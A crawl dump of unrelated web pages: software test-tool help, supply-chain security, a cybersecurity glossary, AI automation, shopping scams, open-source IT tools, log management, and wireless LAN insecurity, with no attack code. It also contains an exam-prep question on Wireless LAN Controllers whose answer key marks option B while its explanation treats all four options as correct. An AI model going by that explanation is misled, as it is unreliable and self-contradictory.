https://blogs.cisco.com/education/do-you-do-the-flip-flipped-classroom-that-is
2024-09-12T03:11:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00196.warc.gz
en
0.94157
397
2.59375
3
Visual Navigator graphically represents the elements of a visual test and allows you to interact with each element through a point-and-click interface. When viewed in the Visual Navigator, a visual test is represented by information displayed in four panes that collectively provide a comprehensive view of each step in a visual test. The four panes include: Lists each step of a visual test in clear non-technical language. Displays a snapshot of the application under test as it appears when a step executes during playback of a visual test. Displays the properties of a step in a visual test. Displays the flow of a visual test through the use of thumbnail images, which represent the logical groups of steps in a visual test. The Screen Preview, Storyboard, and Properties panes are synchronized with the Test Steps pane and display information specific to a selected step in the Test Steps pane. In this way, you can easily view all aspects of a step by selecting a step in the Test Steps pane, and then viewing information about the step in the other panes. In addition to viewing a visual test, the Visual Navigator also allows you to enhance or update an existing visual test by using the Screen Preview and Properties panes. For example, in the Properties pane, after recording a visual test, you can change the literal value of a recorded property by replacing it with a variable. Additionally, to quickly update a visual test when changes occur in the application under test, you can update previously captured screens using the Update Screen feature of the Screen Preview. The Visual Navigator also displays the playback result of a visual test using the same panes as those used for a visual test. For a result, the panes have additional functionality and appear in the Result window, which contains toolbar options and several tabs that display different views of result content. Examples of additional functionality specific to a result include the ability to see the pass or fail status of each step in the Test Steps pane. Additionally, in the Screen Preview, you can see a comparison of the differences between the screens captured during recording and screens captured during playback, and then update the existing visual test without accessing the test application.
<urn:uuid:de1f3fa3-def9-4b17-bd26-b0e083ceff8f>
CC-MAIN-2024-38
https://www.microfocus.com/documentation/silk-test/195/en/silktestworkbench-195-help-en/SILKTEST-FB884B57-VISUALNAVIGATOR-CON.html
2024-09-12T02:33:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00196.warc.gz
en
0.883281
447
2.546875
3
Supply chains need to be more robust. Over the last 20 years these have been run to maximize efficiency throughout the global manufacturing industry, however they have also become a source of vulnerability. The nature of the vulnerability depends on your perspective. Often the issue is security of delivery of a scarce resource. For example, semiconductor shortages are causing automobile manufacturers to idle production lines, and vaccine delivery to many parts of the world is problematic. However, there is growing concern on supply chain security from the cyber risk perspective. The recent Solar Winds breach is an example of a ‘supply chain’ malware delivery system where the exploit package is injected into some generic software update, and subsequently gets a free piggy back ride directly into the enterprise. Tighter control on authorization credentials and the process of who can assemble, submit and digitally sign software updates is required to help mitigate this attack vector. The more general case of cyber risk becoming apparent with IoT. Semiconductors are designed, built, and integrated into subsystems that perhaps have 5G connectivity built in, packaged and software loaded up, and then shipped out. These might be standalone components or elements that go up the manufacturing chain for further integration. Ultimately, they get powered up, configured, and live out some operational life. The hard problems are many. How do you trust this device? Is the design secure? Was it manufactured according to the design? Did something change along the way, maybe after a compliance and certification test? How can you verify all this? Digital signatures and verification on all IoT elements will provide the largest contribution to mitigating these issues. This is a fundamental building block to gaining trust. When IoT devices are powered up and undergo initial configuration and provisioning, the digital signature on the software load can be verified. There is a ‘trust anchor’ involved in this step, as electronic trust starts and stops from known points. The start point is the digital certificate baked into the device at manufacture. This certificate needs to be trusted by all downstream verifiers. In critical infrastructure and other safety related applications, government regulations and compliance will form a major part of the trust mechanism by requiring verification to be completed before a particular device can deployed. This can work during provisioning where the electronic credentials (serial number included) of the device is verified against a list of known and approved devices for a particular jurisdiction or application. Only when the validation passes will provisioning be complete and operations can begin. The device will be known to be trustworthy, and verification proves that it was not modified in transit. To continue to trust the IoT device the supply chain of software updates must be managed. Being able to verify who can deliver and update that software, and that it is being delivered as intended, is fundamental to maintaining this trust. Public key cryptography provides the tools for this, and a caution here as well – the implementation must be able to withstand quantum attacks that are expected to emerge in the near future. Cryptography Is The Backbone of Digital Trust Trust is not easy, but it is essential. At the end of the day, cryptography is the backbone of digital trust, and should be viewed as critical infrastructure. Managing all cryptographic assets – including certificates, libraries and encryption – is becoming increasingly critical to maintaining security. And with ever-increasing profileration of IoT and connected devices, managing cryptography continuously through a crypto-agile approach will be the most efficient, practical path going forward.
<urn:uuid:10fd2a83-66db-485d-8b3e-37bf796e6511>
CC-MAIN-2024-38
https://www.infosecglobal.com/posts/supply-chain-cybersecurity
2024-09-08T12:24:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651002.87/warc/CC-MAIN-20240908115103-20240908145103-00596.warc.gz
en
0.950687
697
2.8125
3
What is a function of Wireless LAN Controller? Click on the arrows to vote for the correct answer A. B. C. D.B A Wireless LAN Controller (WLC) is a network component that helps to manage and control wireless access points (APs) in a wireless network. It is typically used in enterprise-level deployments, where multiple APs need to be managed centrally. The function of a Wireless LAN Controller includes: C. Sending LWAPP packets to access points: The WLC uses Lightweight Access Point Protocol (LWAPP) to communicate with access points in the wireless network. LWAPP packets are used to send control and management information between the WLC and APs, such as configuration information, firmware updates, and monitoring data. A. Registering with a single access point that controls traffic between wired and wireless endpoints: The WLC acts as a central point of control for all the APs in the wireless network. It registers with each AP and manages their configuration and behavior. The WLC also controls the traffic flow between wired and wireless endpoints, ensuring that wireless clients can communicate with the wired network securely and efficiently. B. Using SSIDs to distinguish between wireless clients: The WLC can define multiple Service Set Identifiers (SSIDs) for different groups of wireless clients. Each SSID is associated with a different set of security policies, allowing the WLC to enforce different levels of access and authentication for different types of wireless clients. D. Monitoring activity on wireless and wired LANs: The WLC can collect monitoring data from each AP in the wireless network, allowing it to monitor the performance and behavior of the network as a whole. The WLC can also collect monitoring data from wired network devices, allowing it to monitor traffic flow between wired and wireless endpoints. In summary, the Wireless LAN Controller is a critical component of enterprise wireless networks, as it provides centralized management, control, and monitoring of access points. Its functions include sending LWAPP packets, registering with access points, using SSIDs to distinguish between wireless clients, and monitoring activity on wireless and wired LANs.
<urn:uuid:029187fd-a719-45f7-ac2f-988d577a475f>
CC-MAIN-2024-38
https://www.exam-answer.com/what-is-wlc-function
2024-09-10T23:15:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651323.1/warc/CC-MAIN-20240910224659-20240911014659-00396.warc.gz
en
0.934384
434
2.640625
3
ABC's of Cybersecurity 32 Cybersecurity acronyms and terms you need to know ABCs of Cybersecurity. APT - Advanced Persistent Threat A cyber attack in which an advanced (possibly state backed) hacker or bad actor targets a specific organization for a long period of time by staying hidden in a network. (BYOD) Bring Your Own Device A policy allowing employees to use personal devices to access company resources Data Incident (or data breach) An event that occurs when information is accessed and/or exfiltrated by an unauthorized person or entity, like a hacker, without the knowledge of the organization from which it came. Distributed Denial of Service (DDoS) A type of attack in which a network is flooded with traffic from multiple sources to overload it and cause a service disruption. The process of converting plaintext into ciphertext using a secret key. Also known as a bad actor or threat actor. An individual who uses a computer system to gain unauthorized access to an account or system for data. Living off the Land A cybersecurity attack that involves hackers using the targets existing and known hardware and/or software resources to engage in malicious activity. Also known as malicious software that is designed to cause harm to a computer system or network. The most common form of cybercrime in which a hacker or bad actor attempts to gain access to personal and/or company data. Phishing typically occurs via email with links containing malware. A form of malware where bad actors encrypt information on a computer system so users are unable to access their own data and demand payment in exchange for giving back the information. A big-picture snapshot of your current cyber risk exposure — revealing vulnerabilities and uncovering opportunities to improve defenses. A cyber-attack that infiltrates information systems through previously unknown vulnerabilities in software and/or firmware. When a company updates any server, device, or system, there is a risk of potential incidents in vulnerable areas within the update. Software used to identify and isolate (quarantine) viruses, worms, and other malicious software from endpoints (laptop, servers, mobile devices, etc.) Business Continuity and Disaster Recovery (BCDR) A solution to reduce business downtime, mitigate legal ramifications, and save SMBs from losing money as the result of disasters, whether natural or human-made. The delivery of computing services, including servers, storage, databases, and software, over the internet. A form of insurance that protects businesses and individuals from financial loss from cyber attacks or incidents. Disaster Recovery Plan A documented procedure for an organization to follow to recover from a disaster that impacts normal operations. Endpoint Detection and Response (EDR) A tool that identifies and investigates threats to a business’s endpoints. EDR solutions replace traditional Anti-virus software by offering more security. eXtended Detection Response (XDR) An advanced security technology that combines multiple security tools and data sources to provide a more thorough and comprehensive look inside your organization's security posture. A network security system that monitors and controls incoming and outgoing network traffic based on security rules. Incident Response (IR) A formal, documented, and organized approach to managing the effects of a security incident or cyberattack. Managed Detection Response (MDR) A cybersecurity solution that uses EDR monitored 24/7/365 using trained expert humans (SOC) to provide a more complete cybersecurity defense. Multi-factor Authentication (MFA) A security method used to add a second layer of authentication when accessing accounts and/or devices. In addition to a username and password, MFA also requires codes, biometrics, or other information Secure Access Service Edge (SASE) A cloud based zero trust architecture which requires no on premise hardware. Security Information and Event Management (SIEM) A log monitoring and archiving tool that provides your business with the ability to identify threats and anomalies in real time, or to investigate historic network, system, and user activities. Single Sign-On (SSO) A technology that gives users access to multiple accounts with just one set of login credentials. SSO simplifies the login process and reduces the risk of poor password hygiene, like weak or reused passwords. Virtual Private Network (VPN) A remote connection method used to obfuscate all network traffic using strong encryption. VPN is often used to access a corporate network, or add security and privacy when using public networks such as in airports or hotels. A service that routinely scans for and patches weak points in your system that could be exploited. The process provides real time visibility into potential flaws so they can be prioritized and addressed before they pose a serious risk. Chief Information Security Officer (CISO) A senior-level executive who is responsible for managing the security of a company’s information and technology. Managed Security Services Provider (MSSP) An MSP (Managed Services Provider) with a focus on security. MSSPs provide services like cybersecurity, BCDR, network monitoring, and more. Network Operations Center (NOC) A centralized location where a team of IT professionals monitor and manage the performance and security of remote monitoring and management software. Security Operations Center (SOC) A 24/7/365 operation staffed by expert humans who review incoming security alerts and takes immediate action to isolate and remediate potential threats before they can cause significant damage.
<urn:uuid:a8e5ce74-a912-44e1-8742-62f35f658150>
CC-MAIN-2024-38
https://www.abadata.com/cybersecurity
2024-09-12T06:42:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00296.warc.gz
en
0.904776
1,123
3.09375
3
Exploring AI and Generative AI Automation In the modern field of AI-based systems and the current innovations in generative AI, organizations are finding new ways to develop more efficient processes and implement game-changing improvements for years to come. For many, there’s a fear of how gen AI could impact their employees, customers, and compliance with regulations. In this guide, we’ll look at how artificial intelligence technology can be safely and effectively deployed into your automations and how you can utilize the abilities of language models and other generative AI automation to transform your business. What Is AI Automation? Automation began with robots performing repetitive tasks – also called robotic process automation (RPA). As artificial intelligence (AI) evolved, automation’s capabilities have expanded to include end-to-end processes, connecting systems, and orchestrating work. That connection of RPA with AI and business process management (BPM) is called intelligent automation (IA). RPA | Performs repetitive tasks | AI | Mimics human thinking | BPM | Automates workflows | IA | Combines RPA, AI, and BPM | Is AI the same as automation? No, AI isn’t the same as automation — but they can work together to do a lot more than either could manage on its own. That team-up is where you get cognitive automation. Automation deploys robots to execute a series of rule-based instructions set by humans, reducing the manual labor involved in routine tasks. If the action goes beyond what the developer programmed, the robots are unable to complete the task. By incorporating AI into RPA and other automation technologies, robots can take the broad outlines laid out by humans and determine their own pathway to achieve the goal. The ML capabilities within AI allow it to learn from its actions so it can improve its performance over time. Here's how that combination works in a nutshell to create intelligent automation: - AI uses ML and complex algorithms to analyze structured and unstructured data. It’s the cognitive decision-making side of IA. - BPM automates workflows and connects people and systems. - RPA completes simple administrative tasks such as form filling and data extraction. Artificial intelligence (AI) as a technology can also include machine learning (ML), natural language processing (NLP), computer vision, and deep learning techniques. What is an example of automation and AI working together? AI automation technologies (AKA intelligent automation) allow organizations to augment their human workers with these IA digital workers to streamline business processes. This helps deal with skills and labor shortages and frees employees from boring, repetitive tasks so they can focus on higher-value strategic work. A good example of this is virtual assistants or AI-powered chatbots. Customer service centers are often bombarded with thousands of emails – too many for a few people to respond to adequately and rapidly within their eight-hour workday. However, AI chatbots answer customer queries instantly, working around the clock to reduce customer wait time. If the chatbot can’t answer a customer’s question, the conversation is brought to a human agent. This helps reduce wait times and backlogs and means the employees can focus on more complex cases. How can you automate more with AI? By putting automation and AI (or gen AI) together, you can take your business capabilities further: - Generative AI interprets and creates content with simulated human intelligence, including text and images, to augment work. Using natural language processing, gen AI can answer customer inquiries and augment decision-making. At SS&C Blue Prism, we’re expanding our intelligent automation with generative AI to enable businesses to automate more complex processes. - Process discovery can use AI to track behavior in real time and extract insights based on that behavior, identifying bottlenecks and opportunities for improvements. After the discovery process, it generates a process map to help your teams develop more automations. - Intelligent document processing (IDP) uses machine learning (ML) for data processing. IDP can extract and validate data from structured and semi-structured documents such as invoices, purchase orders, and application forms. By implementing gen AI, IDP can move beyond process validation to understand the context and purpose of a document and interpret how that data should be used, bringing you a faster time to market. Gen AI elevates each stage of the automation development lifecycle, from process discovery to build, ongoing management, and monitoring. SS&C Blue Prism has partnered with AWS to develop secure and private IA solutions that incorporate enterprise-grade generative AI. How Do I Use AI and Automation? AI automation has a lot of versatility. It can help organizations improve efficiency, reduce errors, and enhance their decision-making processes. Let’s look at some industry use cases: What are examples of AI automation? - Customer service: Let’s say a customer has an issue and they’re looking for an immediate resolution. AI-powered solutions can resolve customer complaints quickly or escalate issues to a service agent for more nuanced cases – ensuring your customers have a streamlined journey to resolution. - Financial services and banking: IA can digitize the loan process and streamline administrative processes such as know-your-customer (KYC) ID verification and anti-money laundering (AML) reporting. AI algorithms can analyze transaction data in real-time to detect unusual patterns and potentially fraudulent activities. - Insurance: IA can streamline many routine tasks in insurance, including underwriting, claims processing, regulatory compliance, and fraud detection. Digital workers can automatically collect data from multiple or disconnected sources and send relevant notifications to agents to speed up the claims decision process. - Manufacturing: With AI-backed analytics, manufacturers can reduce unplanned downtime and improve their efficiency and product quality. AI can analyze supply chain data to optimize inventory levels and distribution routes. IA also helps with predictive maintenance, identifying slowdowns causing yield losses. - Healthcare: Automation can help patients book appointments and clinical staff organizes patient medical records and history. AI can assist in medical diagnoses by analyzing medical images like X-rays and MRIs so doctors can identify issues and get patients the right treatment faster. Gen AI is an ever-evolving field with a lot to offer organizations. Expand your automation plans with generative AI use cases. What Are the Benefits of AI Automation? The reason more organizations turn to AI-powered automation is because of the business benefits. AI’s huge processing power increases the speed, efficiency, and scalability of your automations, helping you achieve a better return on investment (ROI). An AI automated assistant augments your team’s work by actioning AI use cases across systems, from summarizing content to providing valuable decision-making insights. AI systems can process vast amounts of data at high speeds, 24/7. Automated systems provide higher-quality, more reliable, and consistent outputs – be that customer service, products, or a range of services. Scalability and integration By implementing good data, your gen AI can grow your operations at speed while maintaining security and compliance. It can use natural language to make automation requests across systems and generate personalized and summarized content for easier access to relevant information. Automated systems help improve consistency and accuracy, and optimize resource allocation, which can then accelerate productivity and reduce costs associated with duplicated effort and rework. Generative AI changes the nature of work and empowers people to think about your organization’s automation journey differently. Gen AI enables non-tech developers to use natural language prompts to quickly create automations following best practice guidelines and regulations. How Does AI Automation Software Work? There are many types of artificial intelligence software. Before selecting an automation tool, consider what your business goals are and what sort of processes you want to automate. Let’s look at some important aspects of AI automation software. Foundational models are pre-trained models serving as the foundation for a wide range of NLP and other AI tasks. These models are typically trained on vast amounts of text and data so they can learn to understand and generate human-like language and be fine-tuned for specific applications. An example of foundational model development is the generative pre-trained transformer (GPT-3), released by OpenAI in 2020. Cloud automation allows organizations to work without delays or relying on specialist skills while maintaining a high level of security and governance. Cloud aims to lower the total cost of ownership so organizations can deploy, support, and upgrade their automation program fully on the cloud. Many cloud providers also offer hybrid cloud deployment options. An example is SS&C | Blue Prism® Cloud, which combines IA with the cloud to bring a fully hosted and managed platform delivered from the Microsoft Azure or AWS cloud. SS&C | Blue Prism® Next Generation is our cloud-native IA platform that enables you to deploy your digital workers from a single, unified platform to simplify management across your enterprise. AI-powered solutions, and especially generative AI, are growing technological innovations. As regulations around these technologies evolve, it’s imperative your organization ensures compliance and data safety before application deployment. Here are some considerations to keep in mind: - Quality model: Integrate with high-quality enterprise language learning models (LLMs) capable of protecting your data. - Human-in-the-loop: Set up human oversight into AI-powered automations to ensure the outputs are accurate and aligned with your business models. - Continuously monitor: Set up audit trails for your automations and track user activity to prevent unauthorized access and ensure compliance. - Establish parameters: Ensure you give access to the right users to keep your and your customer’s data secure. - AI governance: Monitor your AI activities, including AI model documentation and auditing pipelines, to show how your AI is trained and tested, how it behaves throughout its lifecycle, and any potential risks. AI governance is especially important in heavily regulated industries, as it helps avoid penalties and ensures transparency. Find out how to prepare for this next evolution with our generative AI survival guide. We’ve learned that AI automation, or intelligent automation, uses the cognitive ‘thinking’ capabilities of AI linked with the ‘task performing’ of RPA to streamline business processes. And now, with gen AI making its emergence, the automation possibilities just got a lot broader. Here are your key takeaways for automating more with AI: - Ensure AI governance and good data security and quality for your AI training models. - Consider the use cases of intelligent automation in your business and how you can reap the best benefits. - Develop a plan for your automation before deployment.
<urn:uuid:20509b37-3069-4675-b4b3-a14f0bda45a1>
CC-MAIN-2024-38
https://www.blueprism.com/guides/ai-automation/?ref=digitalaijournal.com
2024-09-12T07:13:50Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00296.warc.gz
en
0.926667
2,235
2.828125
3
Cyberhackers are constantly strengthening their tactics to trick you into giving them your confidential information, especially during the holidays. Here are some of the most common scams happening throughout the holiday shopping season: - Fake Charities and Fundraisers: Receiving calls or emails asking for donations. You think you’re giving your payment information to a staff member, when it’s just a cyberhacker convincing you to give them your information. - Fake Shipping Notifications: You will receive an email regarding a package, but attached within that email is a malware virus link. If you didn’t order anything or don’t recognize the order, don’t open the email. - Amazon Scam Email: The hacker sends a fake email claiming the package you ordered cannot be delivered, prompting you to enter your personal information. The email warns you to enter your information, or you won’t be able to access your Amazon account in the future. - Downloading Mobile Applications: Pay attention to what free apps you download. Some apps are impersonators designed to steal personal information that has been stored within your device. If you question the credibility of the app, it most likely is a fake. - Free Wi-Fi: Open networks give hackers access your device where your personal information, such as credit cards, is stored. To prevent sharing your confidential information, turn off file sharing while connected to free or open Wi-Fi accounts.
<urn:uuid:636d723a-c635-42ff-96f9-884b3450b7a2>
CC-MAIN-2024-38
https://www.centaris.com/2016/12/holiday-shopping-scams/
2024-09-15T20:16:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651647.78/warc/CC-MAIN-20240915184230-20240915214230-00896.warc.gz
en
0.907737
299
2.578125
3
Open Source Tools Every IT Pro Needs to Know Open source is no longer a small part of the IT community. It's a major part of any IT organization for both software development and operations. Open source is a community of IT professionals that give back with free code and tools that can be used in a variety of sectors. If you're an IT professional, here are a few open source tools that you should get acquainted with. We've compiled some development tools as well as operations tools to help you perform better and faster. Operations: Packet Analysis Packet analysis takes complex skills, but you don't have to pay for the right tools. Wireshark is the Number 1 packet analysis tool for operations. If you have suspicious network traffic or need to review packet requests for certain services, you can download Wireshark and get started. This tool is one of the open source community's favorites, so there is plenty of support and tutorials to get you started. Operations: Nmap Do you know what is attached to your network? It's common for IT systems to get out of control as the business grows and more resources are attached to the internal LAN. Nmap is a lightweight open-source program that can help you detect resources on the network. You can even create a "map" of system resources that can be useful for planning and architecture reviews. Development: Deploying Software How long does it take to deploy software to your servers? With Jenkins, you can completely automate the process. Jenkins lets you create scripts that copy files, edit directories, and even call commands on the remote server. It also keeps a repository of all changes, so you can review the updates you've made on your servers. It's perfect for enterprise environments where you're forced to deploy to several servers at once. Development: GitHub Code Repository Most organizations have several software projects in development. Your developers can make tools and create code that works within the organization and isn't a part of a main project. GitHub is an open-source code repository that you can use to manage change control and additions to the current code base. It can be your main repository, or you can use it in addition to other solutions. Operations: Logging Every organization needs a logging tool, and Logz.io offers a way to have a repository and aggregation of your logs for all of your servers and network resources. This tool is great for system administrators that need to monitor several resources across a large network. With this tool, you can aggregate your data, run statistics and review reports for better monitoring and security auditing. Operations: Server and Network Configurations When you deploy dozens of servers across an environment, it's tedious to configure every server and remember to keep configurations uniform. You can overcome this hurdle using Chef. Chef is a configuration automation tool. Similar to Jenkins, it lets you deploy configuration using scripts. Change your script and reconfigure all of your servers on the network. This tool cuts down on hours of configuration deployment and maintenance. Operations and Development: Agile Management Solutions Operations and development must be able to manage projects together. Most IT infrastructure changes affect software on the system, and any development tools must be supported by the operations department. To fully understand changes, the two teams must work together. Agile is a common methodology to handle these changes, but to get the work done you need a reliable tool. Elasticbox is one such tool that brings the two departments together, so they can manage projects in one interface using the Agile methodology. This list of tools is a must-have for any IT organization, but there are numerous others on the market provided by people who understand the importance of having the right automation, development and management. The open-source community is strong, and you'll find plenty of support for many of the popular applications we listed. delivered to your inbox.
<urn:uuid:58575f4a-c19b-4eb7-9fee-7a9e2d704478>
CC-MAIN-2024-38
https://www.cbtnuggets.com/blog/career/career-progression/open-source-tools-every-it-pro-needs-to-know
2024-09-17T01:20:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00796.warc.gz
en
0.947583
791
2.828125
3
Log Management is crucial to IT operations and security, allowing organizations to collect, analyze, and store log data generated by various IT systems, applications, and devices. Log data can provide valuable insights into an organization's IT operations and security posture, helping them detect and resolve issues, comply with regulatory requirements, and improve overall IT performance. However, with the vast amounts of log data generated by modern IT environments, managing logs can be challenging and time-consuming, especially for large organizations with complex IT infrastructures. Effective log management requires a robust strategy, including log collection, analysis, storage, and retention. In this article, we'll explore the four essential steps of log management and the best practices that every IT professional should know. What is Log Management? Log Management is the process of collecting, analyzing, and storing log data generated by various IT systems, applications, and devices. Logs are a record of events, transactions, and activities in an IT environment that provide valuable insights into IT operations, security incidents, and application performance. Log Management involves four important steps: collection, analysis, storage, and retention. It also includes the use of log management tools and techniques to manage and process log data efficiently. A well-designed Log Management system can help organizations streamline their IT operations, comply with regulatory requirements, and enhance their overall security posture. Types of logs Logs can be generated by various IT systems, applications, and devices, and they come in different formats and content. Some common types of logs include the following: - System logs: They contain information about system events, such as startup and shutdown events, hardware errors, and system crashes. - Application logs: They contain information about application events, such as user activities, errors, and performance metrics. - Security logs: They contain information about security-related events, such as login attempts, authentication failures, and malware infections. - Network logs: They contain information about network traffic, such as IP addresses, protocols, and ports. - Audit logs: They contain information about user activities and changes made to the IT environment. 4 key steps in a log management process Log Management helps to improve IT performance and security. It is essential to any organization's IT strategy, especially for those who rely heavily on technology. Here are the four key steps in a log management process: Step 1: Log collection Log collection is the process of collecting log data from various IT systems, applications, and devices. There are different both agent and agentless techniques for log collection: - Agent-based log collection: It involves installing software agents on IT systems and devices to collect log data - Agentless log collection: It involves using network protocols and APIs to collect log data directly from IT systems and devices. The choice of log collection technique depends on various factors, such as the IT environment's complexity, the number of IT systems and devices, and the level of control required over log collection. Best practices for log collection include: - Identifying critical log data. - Reducing noise and redundancy in log data - Implementing security measures to protect log data from unauthorized access. Step 2: Log analysis Log analysis is the process of using log data to identify issues, monitor IT operations, and improve IT performance. There are several tools and techniques for log analysis, such as: - Log parsing: It involves extracting specific data from log files, such as timestamps, IP addresses, and error codes. - Log correlation: It involves analyzing log data from multiple sources to identify patterns and relationships. - Log visualization: It involves presenting log data in graphical formats, such as charts and graphs, to make it easier to understand and interpret. Log analysis can help organizations detect and resolve issues quickly, identify trends and patterns, and make informed decisions. It can also help organizations comply with regulatory requirements and enhance their overall security posture. Step 3: Log storage Storing logs in a centralized location can help organizations manage log data efficiently and facilitate log analysis. There are different storage options for logs, such as: - Local storage: It involves storing log data on local disks or storage devices. - Cloud storage: It involves storing log data in cloud-based storage services, such as Amazon S3 or Microsoft Azure. - Hybrid storage: It involves storing log data both locally and in the cloud. It is essential to choose a storage solution that meets the organization's needs for scalability, accessibility, and compliance. Step 4: Log retention Log retention policies define how long organizations should retain log data. Retention policies should consider various factors, such as regulatory requirements, business needs, and storage capacity. Retaining logs for too long can lead to storage issues and make log analysis more challenging. On the other hand, retaining logs for too short a period can limit an organization's ability to detect and investigate security incidents and other issues. Log Management best practices Effective Log Management requires more than just collecting, analyzing, storing, and retaining log data. It requires a comprehensive approach that includes best practices for Log Management. Here are some of them: 1. Define a clear Log Management policy Start by defining a clear Log Management policy that outlines Log Management's purpose, scope, and objectives. The policy should also define roles and responsibilities, data retention periods, and data disposal procedures. It should also be aligned with the organization's overall IT strategy and regulatory compliance requirements. 2. Collect relevant data Collect only the logs that are relevant to your organization's needs. Collecting too much data can make it difficult to analyze and store logs efficiently, increasing costs and making it harder to detect security threats. Focus on collecting data that provides insight into critical systems, applications, and infrastructure. 3. Use log management tools Use Log Management tools that can help you automate log collection, analysis, and storage. These tools can provide real-time visibility into system performance and security, reduce the time and effort required to manage logs, and help you identify security threats quickly. 4. Regularly review log data Regularly review log data to identify security threats, system issues, and other anomalies. Set up alerts to notify IT teams of critical events and incidents that require immediate attention. Review logs regularly to identify patterns, trends, and changes in system behavior. 5. Ensure log data integrity Ensure the integrity of log data by implementing strong authentication and access control measures. Ensure that logs are encrypted during transmission and storage to protect them from unauthorized access. Verify that log data is tamper-proof by using secure hashing and digital signatures. 6. Monitor Log Management performance Monitor Log Management performance to ensure that log data is being collected, analyzed, stored, and retained effectively. Measure Key Performance Indicators (KPIs) such as data volume, data quality, log retention compliance, and incident response times. Use this information to identify areas for improvement and optimize log management processes. Log Management is a critical component of any organization's IT strategy. It provides real-time visibility into system performance and security, helps detect security threats quickly, troubleshoots system issues, and optimizes IT performance. A comprehensive Log Management process includes four key steps: log collection, log analysis, log storage, and log retention. Effective log management also requires implementing best practices, so organizations can improve their log management processes, reduce the risk of security breaches, and improve system performance. Log management is not a one-time effort but a continuous process requiring ongoing attention and monitoring. With the right tools, processes, and people in place, organizations can master log management and achieve a more secure and reliable IT environment.
<urn:uuid:c7cafad3-a39d-4f40-adf8-a3b613b48742>
CC-MAIN-2024-38
https://blog.invgate.com/log-management
2024-09-18T08:32:04Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651886.88/warc/CC-MAIN-20240918064858-20240918094858-00696.warc.gz
en
0.926998
1,563
3.046875
3
Around the world, hackers are “war driving” through office districts, gathering unprotected data from wireless networks. Corporations and governments are spilling their secrets into the streets, and managers do not realize how vulnerable their networks are. Even more frightening, they may not even know that a base station is attached to their network, transmitting confidential information to anyone with a laptop, a wireless card and some simple software. Jim Geier, a computer consultant who helped to develop Wireless Local Area Networks (WLANs) standards, is busy these days conducting two-day workshops on wireless network security. The 801.11 standard was finalized in 1997, he said, but it took some time for prices to drop and speeds to increase. “When that happened, corporations saw that the performance at least matched with their typical Ethernet capability and that is when it started taking off,” Geier said. According to Dr. Ian Goldberg of Montreal-based Zero Knowledge Systems Inc., part of the problem is the user-friendliness of the technology. “In companies – and I don’t know about the public sector – but in companies, it is not unheard of for employees to just bring equipment to work and plug it in,” Goldberg said. Even when IT managers know they have deployed 802.11 networks, they may forget that they are wireless. “A lot of the time, it just slips their minds that the radio waves don’t stop at your building wall and they can be accessed from a good distance away,” said Goldberg. “A $40 antenna can capture signals from several miles away. I think the record has been 26 miles.” The data that travels over 802.11 is protected, but Jim Geier says U.S. government policy banning the export of high technology has made it easy for hackers to break in. “The 802.11 network has security, so you can use encryption keys to encrypt the data that is being sent between the user and the access point where it is connected to the network,” Geier said. “But the encryption keys were kept fairly weak, mainly to make it easier to export products based on that standard, so the encryption mechanism itself is inherently weak.” The encryption keys themselves are “static” sets of numbers, meaning they stay the same until someone or something changes them. “The administrators are reluctant to change these keys very often because it’s difficult and they have to go out to each end user and have them change numbers to match,” Geier said. These days, hackers are eager to pursue any vulnerability, so companies have developed “sniffing” software that looks at data packets being sent from 802.11 devices. “After collecting roughly 1,000 packets, it can take that and determine what the keys are and tell you what it is,” Geier said. “That can be done on an active network in just a few hours. These tools are available off the Internet for free. So basically the 802.11 security today is useless for all practical purposes.” Firms that make 802.11 products have incorporated enhanced security features into their high-end wireless LAN parts, but these measures are proprietary, meaning buyers who want to expand a network are locked into technology from that company. This is unacceptable for IT administrators who are bound by policy or preference to use only open systems. Getting around the security limitations of today’s 802.11 networks means accepting a drop in performance, adding more equipment or both. Ian Goldberg said managers should insist on the same security measures that apply to other devices reaching the network from the outside. “The wireless network is exactly as insecure as the public Internet,” Goldberg said. “Whatever firewalls you have between your internal network and the Internet, you should have the same thing connected to the wireless network. Just plug your wireless network in where the Internet comes in, before the firewall.” Users love WLANs because they eliminate the bother of physically attaching laptop and handheld computers to their organization’s networks. In the last few years, administrators have purchased thousands of 802.11 networks because they are affordable, easy to install and quickly reconfigured, little realizing how thinly they are shielded from prying eyes. New standards will bring higher levels of security to 802.11 networks within a year or two, but in the meantime, many organizations with wireless networks need to find out whether they have added a new business line – public broadcasting. n Richard Bray is an Ottawa-based writer with an extensive background in public policy journalism. A former producer and reporter with CBC News, he is a specialist in high-tech issues.
<urn:uuid:e0e4a064-0fdf-4f39-b316-827272604f98>
CC-MAIN-2024-38
https://www.itworldcanada.com/article/when-private-networks-arent-so-private/23863
2024-09-19T14:07:55Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00596.warc.gz
en
0.969544
985
2.765625
3
